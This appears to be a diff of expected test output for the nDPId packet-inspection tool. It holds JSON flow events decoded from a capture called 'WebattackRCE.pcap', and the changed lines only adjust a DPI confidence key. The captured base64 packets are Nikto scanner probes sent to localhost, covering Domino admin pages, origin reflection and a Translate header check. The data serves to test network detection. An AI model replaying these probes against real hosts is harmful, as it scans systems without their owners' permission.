{"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276744,"pkt":"AAAAAAAAAAAAAAAACABFAADJ7atAAEAGToF\/AAABfwAAAcH2H5DjmNWMPF0CB4AYAED+vQAAAQEICp1m+zCdZvswR0VUIC9hZG1pbjQubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276745,"pkt":"AAAAAAAAAAAAAAAACABFAADJnTFAAEAGnvt\/AAABfwAAAcH4H5DLFKUODsXYX4AYAED+vQAAAQEICp1m+zGdZvsxR0VUIC9hZG1pbjUubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420276747,"pkt":"AAAAAAAAAAAAAAAACABFAADL46dAAEAGWIN\/AAABfwAAAcH6H5C6Q9uIEYxnOoAYAED+vwAAAQEICp1m+zOdZvsyR0VUIC93ZWJhZG1pbi5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276749,"pkt":"AAAAAAAAAAAAAAAACABFAADONl9AAEAGBcl\/AAABfwAAAcH8H5Dz0w5\/kxB3k4AYAED+wgAAAQEICp1m+zWdZvs1R0VUIC9ub25leGlzdGVudC5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276751,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ubFAAEAGgoV\/AAABfwAAAcH+H5C5FIGNENlwioAYAED+swAAAQEICp1m+zedZvs2R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpwYXJrZWQgZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420276754,"pkt":"AAAAAAAAAAAAAAAACABFAADbnMVAAEAGn1V\/AAABfwAAAcIAH5C\/caTogsAMB4AYAED+zwAAAQEICp1m+zqdZvs5R0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCk9yaWdpbjogbmlrdG8uZXhhbXBsZS5jb20NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} 
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420276756,"pkt":"AAAAAAAAAAAAAAAACABFAADW2EVAAEAGY9p\/AAABfwAAAcICH5Ck9+BnopzEpIAYAED+ygAAAQEICp1m+zydZvs8R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KT3JpZ2luOiAuZXhhbXBsZS5jb20NCg0K"} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} 
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276758,"pkt":"AAAAAAAAAAAAAAAACABFAADPoehAAEAGmj5\/AAABfwAAAcIEH5AAZJnEB3vRtYAYAED+wwAAAQEICp1m+z6dZvs+R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 
